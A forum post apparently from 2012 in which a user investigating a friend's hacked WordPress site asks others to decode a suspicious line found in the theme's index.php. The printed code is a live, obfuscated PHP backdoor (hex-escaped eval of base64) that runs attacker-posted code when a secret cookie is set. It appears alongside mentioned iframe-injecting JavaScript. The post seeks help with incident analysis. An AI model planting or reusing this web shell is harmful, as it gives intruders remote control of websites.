Strange PHP code in Wordpress theme
Posted: Wed Nov 21, 2012 1:46 pm
Hi,
A friend of mine's WordPress site got hacked recently and I'm going through all the files to try and work out what happened. I won't mention the theme in question here but there are four suspect files - three of them are JavaScripts that have had document.write() appended to them to load in 3rd party sites into an iframe in the main template but the fourth file (index.php) has the following code right at the top:
Anyone have any idea how to "decode" this, or work out what it's doing?
Thanks in advance,
Mecha Godzilla
A friend of mine's WordPress site got hacked recently and I'm going through all the files to try and work out what happened. I won't mention the theme in question here but there are four suspect files - three of them are JavaScripts that have had document.write() appended to them to load in 3rd party sites into an iframe in the main template but the fourth file (index.php) has the following code right at the top:
Code: Select all
preg_replace("/.+/esi","\x65\x76\x61\x6C\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'aWYgKCFlbXB0eSgkX0NPT0tJRVsndiddKSBhbmQgJF9DT09LSUVbJ3YnXT09J2QnKXtpZiAoIWVtcHR5KCRfUE9TVFsnYyddKSkge2VjaG8gJzx0ZXh0YXJlYSByb3dzPTI4IGNvbHM9ODA+JzsgJGQ9YmFzZTY0X2RlY29kZShzdHJfcmVwbGFjZSgnICcsJysnLCRfUE9TVFsnYyddKSk7aWYoJGQpIGV2YWwoJGQpOyBlY2hvICc8L3RleHRhcmVhPic7fQ0KZWNobyAnPGZvcm0gYWN0aW9uPSIiIG1ldGhvZD1wb3N0Pjx0ZXh0YXJlYSBjb2xzPTgwIHJvd3M9MjggbmFtZT1jPjwvdGV4dGFyZWE+PGJyPjxpbnB1dCB0eXBlPXN1Ym1pdD48L2Zvcm0+JztleGl0O30='\x29\x29\x3B",'1');Thanks in advance,
Mecha Godzilla